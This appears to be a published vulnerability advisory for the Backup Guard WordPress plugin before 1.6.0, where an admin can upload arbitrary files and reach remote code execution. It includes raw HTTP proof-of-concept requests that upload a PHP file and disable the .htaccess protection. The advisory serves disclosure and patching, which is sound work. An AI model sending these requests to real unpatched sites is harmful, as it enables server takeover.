Backup Guard < 1.6.0 - Authenticated Arbitrary File Upload
Description
The plugin did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE. Additional Info, and Bypass of .htaccess protection found by WPScanTeam, while confirming the issue: There is a protection in place against accessing the uploaded files, via a .htaccess in the wp-content/uploads/backup-guard/ folder, however: - Some web servers do not support .htaccess, e.g Nginx, making it useless in such case - Arbitrary content can be appended to the existing .htaccess, to make the deny from all invalid, and bypass the protection on web servers such as Apache Note: v1.6.0 forced the uploaded file to have the .sgbp extension by adding it if not present, but the file content is not verified, which could still allow chaining with an issue such as LFI or Arbitrary File Renaming to achieve RCE
Proof of Concept
Video of the issue on a Nginx Web server, as sent by the reporter: https://drive.google.com/file/d/1W9faaIZ6rPgrui8lzeY2s9cgKrGJhWTL/view?usp=sharing Additional Info (WPScanTeam): As an administrator, open the Backup page (/wp-admin/admin.php?page=backup_guard_backups) and Import a PHP file, which will then be located at /wp-content/uploads/backup-guard/<filename.php> If the web server supports .htaccess, just import a .htaccess with b as content, which will be appended to the existing .htaccess, making the deny from all become deny from allb and be invalid without raising any error Raw requests: POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=b4c6ea799c HTTP/1.1 Host: wp.lab User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://wp.lab/wp-admin/admin.php?page=backup_guard_backups X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------130490272991349650929022108 Content-Length: 229 Origin: https://wp.lab Connection: close Cookie: [Admin cookies] -----------------------------130490272991349650929022108 Content-Disposition: form-data; name="files[]"; filename="info.php" Content-Type: text/php <?=phpinfo();?> -----------------------------130490272991349650929022108-- If .htaccess supported by the webserver, the following request will remove the protection by appending a b to the existing deny from all line: POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=b4c6ea799c HTTP/1.1 Host: wp.lab User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://wp.lab/wp-admin/admin.php?page=backup_guard_backups X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------130490272991349650929022108 Content-Length: 216 Origin: https://wp.lab Connection: close Cookie: [Admin cookies] -----------------------------130490272991349650929022108 Content-Disposition: form-data; name="files[]"; filename=".htaccess" Content-Type: text/php b -----------------------------130490272991349650929022108--
Affects Plugins
Fixed in version 1.6.0✓
References
Classification
Type
UPLOAD
CWE
Miscellaneous
Original Researcher
Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)
Submitter
khanh
Submitter website
Verified
Yes
Timeline
Publicly Published
2021-02-18 (about 2 months ago)
Added
2021-02-18 (about 2 months ago)
Last Updated
2021-02-20 (about 2 months ago)